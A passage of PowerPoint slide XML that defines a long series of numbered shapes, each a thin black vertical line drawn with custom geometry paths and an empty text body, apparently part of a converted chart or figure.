          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="57150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="56827"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="object 194"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3272766" y="5580031"/>
            <a:ext cx="2517" cy="110735"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="55880">
                <a:moveTo>
                  <a:pt x="1244" y="55327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="55327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="55603"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="object 195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300892" y="5586734"/>
            <a:ext cx="0" cy="104443"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="52705">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="52215"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="object 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3299827" y="5589961"/>
            <a:ext cx="1258" cy="100668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="50800">
                <a:moveTo>
                  <a:pt x="0" y="50316"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="50316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="50592"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="object 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3328797" y="5568468"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61438"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="object 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3328524" y="5570099"/>
            <a:ext cx="2517" cy="120801"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="60960">
                <a:moveTo>
                  <a:pt x="698" y="60339"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="60339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="60615"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="object 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356705" y="5560425"/>
            <a:ext cx="0" cy="130868"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="66039">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="65497"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="object 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354501" y="5560673"/>
            <a:ext cx="2517" cy="129610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="65405">
                <a:moveTo>
                  <a:pt x="0" y="65096"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="65372"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="object 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3384557" y="5550247"/>
            <a:ext cx="0" cy="140935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="71119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="70633"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="object 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3384285" y="5550247"/>
            <a:ext cx="1258" cy="140935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="71119">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="70633"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="object 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3412462" y="5540607"/>
            <a:ext cx="0" cy="149743"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="75564">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="75493"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="object 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3412189" y="5540027"/>
            <a:ext cx="2517" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="76200">
                <a:moveTo>
                  <a:pt x="1244" y="75515"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="75515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="75791"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="object 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440315" y="5539522"/>
            <a:ext cx="0" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76045"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="object 206"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3439250" y="5539522"/>
            <a:ext cx="1258" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="76200">
                <a:moveTo>
                  <a:pt x="0" y="75769"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="75769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="76045"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="object 207"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468222" y="5541154"/>
            <a:ext cx="0" cy="149743"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="75564">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="75217"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="object 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3467949" y="5540273"/>
            <a:ext cx="2517" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="76200">
                <a:moveTo>
                  <a:pt x="698" y="75390"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="75390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="75666"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="object 209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496128" y="5525066"/>
            <a:ext cx="0" cy="166102"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="83819">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="83335"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="object 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493924" y="5526953"/>
            <a:ext cx="2517" cy="163585"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="82550">
                <a:moveTo>
                  <a:pt x="0" y="82112"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="82112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="82388"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="object 211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523980" y="5523983"/>
            <a:ext cx="0" cy="167360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="84455">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="83887"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="object 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523708" y="5526406"/>
            <a:ext cx="1258" cy="164844"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="83185">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="82664"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="object 213"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551341" y="5507348"/>
            <a:ext cx="0" cy="183719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="92710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="92281"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="object 214"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3551068" y="5507348"/>
            <a:ext cx="3775" cy="183719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="92710">
                <a:moveTo>
                  <a:pt x="1374" y="92005"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1374" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="92005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92281"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="object 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3579246" y="5518621"/>
            <a:ext cx="0" cy="172394"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="86994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="86593"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="object 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3578427" y="5518319"/>
            <a:ext cx="1258" cy="172394"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="86994">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="86745"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="object 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607098" y="5485900"/>
            <a:ext cx="0" cy="205111"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="103505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="103106"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="object 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606825" y="5485900"/>
            <a:ext cx="2517" cy="205111"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="103505">
                <a:moveTo>
                  <a:pt x="828" y="102829"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="102829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="103106"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="object 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3635004" y="5491808"/>
            <a:ext cx="0" cy="198819"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="100330">
                <a:moveTo>
